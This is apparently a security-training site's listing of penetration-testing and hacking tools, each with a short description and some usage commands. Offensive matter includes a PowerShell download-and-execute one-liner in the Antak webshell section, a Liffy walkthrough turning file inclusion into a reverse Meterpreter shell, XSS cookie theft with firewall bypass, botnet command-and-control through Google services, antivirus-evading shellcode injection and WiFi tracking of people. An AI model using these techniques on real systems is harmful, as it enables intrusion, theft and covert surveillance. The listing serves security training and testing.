White Hat Hacker Capital of Buôn Ma Thuột

The Vietnam White Hat Hacker training program in Buôn Ma Thuột City, combined with tourism. Arrive as a newbie - leave as a WHITE HAT HACKER!

Hacking and Penetration Testing with Metasploit

Security365's training program on using the Metasploit Framework for penetration testing and hacking.

C50 Computer Forensics Materials

Study materials on digital evidence investigation (CHFI), compiled by Security365 for training at C50.

Students, Hacking and Information Security

A hacking competition for students, with web attack challenges built on the Hackademic Challenge platform.

Attack and Defense with BackTrack / Kali Linux

A course on attack and defense with the professional hacker toolkits BackTrack and Kali Linux, based on Offensive Security content.

Passive Spider - Information Gathering from Search Engine Tool

Passive Spider uses search engines (currently only Bing supported) to find interesting information about a target domain.

INSTALL
git clone https://github.com/RandomStorm/passive-spider.git
cd passive-spider
gem install bundler && bundle install
Place your search engine API keys in the api_keys.config file. Each search engine API has different usage limits and pricing; refer to the provider's documentation for this information. Do not share your keys.
Tested on Mac OS X with Ruby 1.9.3 & Ruby 2.1.2.

ARGUMENTS

--domain      || -d   The domain you would like to use as a target.
--pages       || -p   The number of pages you would like to hit from the search engine. Default: 10
--all         || -a   Do all of the spidering checks. This is the default check.
--allpages            Find all pages related to the domain, limited by the --pages option.
--allfiles            Find all file types related to the domain, limited to the ones configured.
--neighbours          Find other domains that are on the same IP address.
--urlkeywords         Find page URLs that have 'interesting' keywords in them.
--keywords            Find page content that has 'interesting' keywords in it.
--export      || -e   Request URLs through a proxy. Specify a proxy (type://ip:port) or use the default. Default: http://127.0.0.1:8080
--help        || -h   This output.

USAGE

- Run all checks against the given domain...
ruby pspider.rb -d www.example.com

- Run all checks against the admin subdomain...
ruby pspider.rb -d admin.example.com

- Run all checks against the given domain, limited to 50 search engine pages...
ruby pspider.rb -d www.example.com -p 50

- Run the IP Neighbour check against the given domain...
ruby pspider.rb -d www.example.com --neighbours


YASAT - Yet Another Stupid Audit Tool



YASAT (Yet Another Stupid Audit Tool) is a simple, stupid audit tool.
Its goal is to be as simple as possible with minimal binary dependencies (only sed, grep and cut).
Its second goal is to document each test with as much information as possible, including links to official documentation.
It runs many tests that check for security configuration issues and other good practices.
It checks many software configurations, including:
  • Apache
  • Bind DNS
  • CUPS
  • PHP
  • kernel configuration
  • mysql
  • network configuration
  • openvpn
  • Packages update
  • samba
  • snmpd
  • squid
  • syslog
  • tomcat
  • user accounting
  • vsftpd
  • xinetd
YASAT is licensed under the GPLv3.


HashMyFiles - Calculate MD5/SHA1/CRC32 hashes of your files


HashMyFiles is a small utility that allows you to calculate the MD5 and SHA1 hashes of one or more files on your system. You can easily copy the MD5/SHA1 hash list to the clipboard, or save it to a text/html/xml file.

HashMyFiles can also be launched from the context menu of Windows Explorer, and display the MD5/SHA1 hashes of the selected file or folder.

Using HashMyFiles

HashMyFiles doesn't require any installation process or additional DLL files. In order to start using it, simply run the executable file (HashMyFiles.exe). 

After you run it, you can add the files and folders whose MD5/SHA1 hashes you want to view. You can do this by using the 'Add File' and 'Add Folder' options under the File menu, or simply by dragging the files and folders from Explorer into the main window of HashMyFiles.

After adding the desired files, you can copy the MD5/SHA1 hashes to the clipboard, or save the hash list to a text/html/xml file.

Shellter - A Dynamic ShellCode Injector


Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created.
It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only).

The shellcode can be something yours or something generated through a framework, such as Metasploit.

Shellter takes advantage of the original structure of the PE file and doesn't apply any modification such as changing memory access permissions in sections, adding an extra section with RWE access, or anything else that would look dodgy under an AV scan.

Shellter uses a unique dynamic approach which is based on the execution flow of the target application.


PAExec - The Redistributable PsExec (Launch Remote Windows Apps)

PAExec lets you launch Windows programs on remote Windows computers without needing to install software on the remote computer first. For example, you could launch CMD.EXE remotely and have the equivalent of a terminal session to the remote server. PAExec is useful for doing remote installs, checking remote configuration, etc.


PAExec - The Redistributable PsExec

Microsoft's PsExec tool (originally by SysInternals' Mark Russinovich) is a favorite of system administrators everywhere. It has just two tiny flaws:
  1. PsExec cannot be redistributed
  2. Sensitive command-line options like usernames and passwords are sent as clear text

We needed something that would overcome those two issues, and not finding a suitable replacement, decided to write our own.

Examples


PAExec \\{server IP address} -s cmd.exe
Creates a telnet-like session on the remote server, running as Local System.

PAExec \\{server IP address} ipconfig
View network configuration on the remote server without needing to do an RDP session.

PAExec \\{server IP address} -u {username} -p {password} -i -c MyApp.exe
Copy MyApp.exe to the remote server and run it as {username} so that it shows up on the remote server.

DarunGrim - A Patch Analysis and Binary Diffing Tool


DarunGrim is a free binary diffing tool.

Binary diffing is a powerful technique for reverse-engineering patches released by software vendors like Microsoft. In particular, by analyzing security patches you can dig into the details of the vulnerabilities they fix. You can use that information to learn what causes software to break, and it can help you write protection code for those specific vulnerabilities. It is also used to write 1-day exploits, by malware writers and security researchers alike.

This binary diffing technique is especially useful for Microsoft binaries. Unlike other vendors, they release patches regularly, and the patched vulnerabilities are relatively concentrated in small areas of the code. That makes the patched part more visible and apparent to the patch analyst.


XSSYA - Cross Site Scripting Scanner & Vulnerability Confirmation


XSSYA works by executing the payload, encoded to bypass the Web Application Firewall. The first method sends the request and checks the response: if the server responds with 200, XSSYA moves on to Method 2, which searches for the decoded payload in the page's HTML code. If that is confirmed, the last step is to execute document.cookie to get the cookie.


XSSYA Features
  • Supports HTTPS
  • After confirmation, executes the payload to get cookies
  • Can be run on Windows and Linux
  • Identifies 3 types of WAF (Mod_Security - WebKnight - F5 BIG IP)
  • Contains a library of encoded payloads to bypass WAFs (Web Application Firewalls)
  • Supports saving the page's HTML code before executing the payload, and viewing the HTML code on the screen or terminal

Nosql-Exploitation-Framework - A Framework for NoSQL Scanning and Exploitation


A framework for NoSQL scanning, enumeration and exploitation.
NoSQL databases are schemaless databases. They were invented to store data easily and flexibly.
NoSQL databases have gained popularity, and their security has always been under scrutiny.
The NoSQL Exploitation Framework focuses on scanning, enumerating and exploiting these databases.
The tool has support for over 5 databases: MongoDB, CouchDB, Redis, H-Base and Cassandra.

Added Features:

  • First ever tool with added support for Mongo, Couch, Redis, H-Base and Cassandra
  • Support for NoSQL web apps
  • Added payload list for JS injection and web application enumeration
  • Scan support for Mongo, CouchDB and Redis
  • Dictionary attack support for Mongo, Couch and Redis
  • Enumeration module added for the DBs; retrieves data in the DBs in one shot
  • Currently discovers the web interface for Mongo
  • Shodan query feature
  • Multithreaded IP list scanner
  • Dump and copy database features added for CouchDB
  • Sniff for Mongo, Couch and Redis

Installation

  • Run chmod +x install.sh nosqlmap.py
  • ./install.sh
  • nosqlexp.py -h (for help options)

Sample Usage

  • nosqlexp.py -ip localhost -scan
  • nosqlexp.py -ip localhost -dict mongo -file b.txt
  • nosqlexp.py -ip localhost -enum couch
  • nosqlexp.py -ip localhost -enum redis
  • nosqlexp.py -ip localhost -clone couch
  • nosqlexp.py -ip localhost -webapp "web_app_link"

Antak WebShell - A webshell which utilizes PowerShell


Antak is a webshell written in C#.Net which utilizes PowerShell. Antak is a part of Nishang, and updates can be found here: https://github.com/samratashok/nishang

Use this shell as a normal PowerShell console. Each command is executed in a new process; keep this in mind when using commands that depend on state (like changing the current directory or running session-aware scripts).

Executing PowerShell scripts on the target -
  1. Paste the script in the command textbox and click 'Encode and Execute'. A reasonably large script can be executed this way.
  2. Use a PowerShell one-liner (example below) for download and execute in the command box: IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
  3. Upload the script to the target and execute it.
  4. Make the script a semicolon-separated one-liner.
Files can be uploaded and downloaded using the respective buttons.

Uploading a file - To upload a file, enter the actual path on the server (with write permissions) in the command textbox. (An OS temporary directory like C:\Windows\Temp may be writable.) Then use the Browse and Upload buttons to upload the file to that path.

Downloading a file - To download a file, enter the actual path on the server in the command textbox. Then click the Download button.

Main Features:
  • Upload a file
  • Download a file
  • Executing Scripts
  • Remoting/Pivoting

Moo0 File Monitor - Monitor file access easily


Moo0 File Monitor lets you easily monitor file access activity on your system.
Have you ever wondered what is going on with your disk system behind your back? Why is the disk busy? What is scratching your HDD? You can find out using this simple program.


OWASP Mantra Security Toolkit - Browser Based Security Framework


OWASP Mantra is a collection of free and open source tools integrated into a web browser, which can come in handy for students, penetration testers, web application developers, security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.

Mantra is light, flexible, portable and user friendly, with a nice graphical user interface. You can carry it on memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on your system within minutes. Mantra is absolutely free of cost and takes no time to set up.

Mantra is a browser especially designed for web application security testing. By having such a product, more people will come to know the easiness and flexibility of being able to follow basic testing procedures within the browser. Mantra believes that having such a portable, easy to use and yet powerful platform can be helpful for the industry.

Mantra has many built-in tools to modify headers, manipulate input strings, replay GET/POST requests, edit cookies, quickly switch between multiple proxies, control forced redirects etc. This makes it good software for performing basic security checks and sometimes exploitation. Thus, Mantra can be used to solve basic levels of various web.

Mantra Provides
  • A web application security testing framework built on top of a browser.
  • Supports Windows, Linux (both 32 and 64 bit) and Macintosh.
  • Can work with other software like ZAP using the built-in proxy management function, which makes it much more convenient.
  • Available in 9 languages: Arabic, Chinese (Simplified), Chinese (Traditional), English, French, Portuguese, Russian, Spanish and Turkish
  • Comes installed with major security distributions including BackTrack and Matriux

Xenotix xBOT - A Cross Platform PoC Bot that abuses certain Google Services to implement its C&C


Xenotix xBOT is a proof of concept cross platform (Linux, Windows, Mac) bot written in Python that abuses certain Google Services to implement a Command & Control Center for the botnet. The Google Apps Data API, Google Forms and Google Spreadsheets are abused to implement C2 for a bot network. A Google Form can act as the C2 for a bot network: all entries submitted to the Google Form are sent to an attached Spreadsheet. Here we can implement a bot that listens on the Google Data API URL, extracts the commands and later sends back the response via the same Form. The Google Data API allows us to fetch the contents of a published spreadsheet in a variety of formats. The spreadsheet feeds are fetched in RSS format and parsed. To implement the bot we parse through the source, fetch the commands and carry out the corresponding operations. xBOT's communication is encrypted because it uses Google's own SSL connection, and it is not affected by firewalls because it works at the application layer. The botnet's commands and responses are encrypted with SSL from Google itself, making it harder to sniff the bot's communications on the network. It is a prototype bot with the bare minimum features of a typical bot. The intention of this tool is to give an idea of how Google APIs can be abused for botnet implementation.

xBOT COMMANDS
  • xSYSINFO : Get System Information
  • EXECUTE : Execute a passive system command
  • xDOWNLOAD : Download a file from an URL
  • xUPLOAD : Upload a file
  • xNETWORK : Get network information
  • xPORTSCAN : Run a Portscan
  • xSCREENSHOT : Grab a Screenshot
  • xKILL : Kill and Remove the xBOT.

Snoopy - A distributed tracking and data interception framework


Snoopy is a distributed tracking and profiling framework which can perform interesting tracking and profiling of mobile users through the use of WiFi.

There have been recent initiatives from numerous governments to legalise the monitoring of citizens’ Internet based communications (web sites visited, emails, social media) under the guise of anti-terrorism.

Several private organisations have developed technologies claiming to facilitate the analysis of collected data with the goal of identifying undesirable activities. Whether such technologies are used to identify such activities, or rather to profile all citizens, is open to debate. Budgets, technical resources, and PhD-level staff are plentiful in this sphere. This inspired the goal of the Snoopy project: with the limited time and resources of a few technical minds, could we create our own distributed tracking and data interception framework, with functionality for simple analysis of the collected data?

Snoopy consists of four components:
  • Client software (aka Snoopy Drone software)
  • Server software
  • Web interface
  • Maltego transforms

Plug-ins
Plug-ins consist of two parts:
  • Back-end (data providing) part, written in Python
  • Front-end (displaying) part, written in JavaScript (optional)

Requirements
  • Ubuntu 12.04 LTS 32bit online server
  • One or more Linux based client devices with internet connectivity and a WiFi device supporting injection drivers. We’d recommend the Nokia N900.
  • A copy of Maltego Radium

Web Interface: You can access the web interface via http://yoursnoopyserver:5000/. You can write your own data exploration plugins. Check the Appendix of the README file for more info on that.


sb0x-project - A simple and Lightweight framework for Penetration testing


sb0x-project is a lightweight framework for penetration testing, written in Python.


Platforms:
  • Linux
  • BSD
  • "Or Unix System"

Bing Heartbleed Scan - Tool to extract sites from a Bing search and check whether they are vulnerable


A simple scanner written in bash that extracts sites from a Bing search and checks whether they are vulnerable.


ByWaf - Web Application Penetration Testing Framework


ByWaf is a Web Application Penetration Testing Framework (WAPTF). It consists of a command-line interpreter and a set of plugins. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License.

The Bywaf application is built on Python's built-in cmd.Cmd class. Cmd is a lightweight command interpreter loop that provides several useful facilities for the developer, including overridable hook methods and easy addition of commands and help. For the user, it offers command-line editing with readline, including automatic tab completion of commands, command options and filenames.

Bywaf contains a sub-classed version of Cmd called Wafterpreter, which adds several important features, including:
  • Loading and selecting plugins.
  • Getting and setting global and per-plugin options.
  • Additional methods exposing functionality to the plugins.
  • Backgrounding jobs, ending running jobs and querying job status.
  • Loading scripts from the command-line or within the interpreter.
  • Loading, saving, showing and clearing the command history.

Wafterpreter API and utility methods:
The Wafterpreter API encompasses methods used by the plugins as well as the Wafterpreter's own methods; this allows plugins to refine its behavior by assigning their own methods in their place.

Utility methods are time-saving shortcuts, while the API methods are the preferred way to change the interpreter's behavior and to perform queries about jobs.
  • filename_completer(): a utility method and API method that, given the starting and ending indices of the current word under the command-line cursor, returns the available filenames the word matches. The parameters to this method are supplied to completion methods, which can in turn pass them on to it.
  • get_job(): this utility method retrieves a Futures instance from the Wafterpreter's internal list of completed and running jobs, given its job ID. This is useful for querying information about individual jobs (see do_kill() for an example).
  • finished_job_callback(): This overridable method is called upon the completion of a backgrounded job. It is used by the onecmd() method to notify the user when a backgrounded job has finished.
  • set_prompt(): an API method for setting the prompt to reflect a new plugin name.
  • get_history_item(): an API method returning the command history.
  • save_history(): an API method for saving the command history to a file.
  • load_history(): an API method for loading the command history from a file.
  • clear_history(): an API method for clearing the command history.
  • load_module(): a private low-level method for loading modules. Gets called by do_use(). There should not be a reason for its use outside that method.

WebCookiesSniffer - Capture Web site cookies


WebCookiesSniffer is a packet sniffer tool that captures all Web site cookies sent between the Web browser and the Web server and displays them in a simple cookies table. The upper pane of WebCookiesSniffer displays the cookie string and the Web site/host name that sent or received this cookie. When selecting a cookie string in the upper pane, WebCookiesSniffer parses the cookie string and displays the cookies as name-value format in the lower pane.

RCEer - Simple Remote Command Execution scanner


Simple Remote Command Execution scanner written in Python 2.7

Bro - Passive Open-Source Network Traffic Analyzer

While focusing on network security monitoring, Bro provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Bro has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyberinfrastructure. Bro’s user community includes major universities, research labs, supercomputing centers, and open-science communities.

Bro is a passive, open-source network traffic analyzer. It is primarily a security monitor that inspects all traffic on a link in depth for signs of suspicious activity. More generally, however, Bro supports a wide range of traffic analysis tasks even outside of the security domain, including performance measurements and helping with trouble-shooting.

Features
  • Deployment
    • Runs on commodity hardware on standard UNIX-style systems (including Linux, FreeBSD, and MacOS).
    • Fully passive traffic analysis off a network tap or monitoring port.
    • Standard libpcap interface for capturing packets.
    • Real-time and offline analysis.
    • Cluster-support for large-scale deployments.
    • Unified management framework for operating both standalone and cluster setups.
    • Open-source under a BSD license.
  • Analysis
    • Comprehensive logging of activity for offline analysis and forensics.
    • Port-independent analysis of application-layer protocols.
    • Support for many application-layer protocols (including DNS, FTP, HTTP, IRC, SMTP, SSH, SSL).
    • Analysis of file content exchanged over application-layer protocols, including MD5/SHA1 computation for fingerprinting.
    • Comprehensive IPv6 support.
    • Tunnel detection and analysis (including Ayiya, Teredo, GTPv1). Bro decapsulates the tunnels and then proceeds to analyze their content as if no tunnel was in place.
    • Extensive sanity checks during protocol analysis.
    • Support for IDS-style pattern matching.
  • Scripting Language
    • Turing-complete language for expressing arbitrary analysis tasks.
    • Event-based programming model.
    • Domain-specific data types such as IP addresses (transparently handling both IPv4 and IPv6), port numbers, and timers.
    • Extensive support for tracking and managing network state over time.
  • Interfacing
    • Default output to well-structured ASCII logs.
    • Alternative backends for ElasticSearch and DataSeries. Further database interfaces in preparation.
    • Real-time integration of external input into analyses. Live database input in preparation.
    • External C library for exchanging Bro events with external programs. Comes with Perl, Python, and Ruby bindings.
    • Ability to trigger arbitrary external processes from within the scripting language.

Simple SQLi Dumper v5.1 - Tool to find bugs, errors or vulnerabilities in MySQL database


SSDp is a useful penetration testing tool for finding bugs, errors or vulnerabilities in MySQL databases.

Functions
  • SQL Injection
  • Operation System Function
  • Dump Database
  • Extract Database Schema
  • Search Columns Name
  • Read File (read only)
  • Create File (read only)
  • Brute Table & Column

Liffy - Local File Inclusion Exploitation Tool


Liffy is a tool written in Python designed to exploit local file inclusion vulnerabilities using three different techniques that will get you a working web shell. The first two make use of the built-in PHP wrappers php://input and data://. The third makes use of the process control extension called 'expect'.

For those unfamiliar I've included some links that highlight the usage of these techniques in LFI exploitation.

Exploitation

Once you have found a local file inclusion vulnerability, you simply point liffy at its location and select which technique you want to use.
./liffy --url http://target/vuln/file.php?= --data

The tool will create a PHP Meterpreter payload using msfpayload and drop it into your /tmp directory. It will then attempt to use the PHP wrapper to download the generated shell, which you should be hosting using either Node's or Python's HTTP web server.
http-server /tmp -p 8000

If all this works you should see a GET request for your shell, which is then downloaded to the working directory on the target webserver. From there a Metasploit resource file is created for you, to spawn a listening handler for inbound connections from the reverse PHP Meterpreter.
msfconsole -r php_listener.rc

Now you simply curl the location of your webshell and you should see a new Meterpreter session spawn.
curl --silent http://target/vuln/7ka0tqsq.php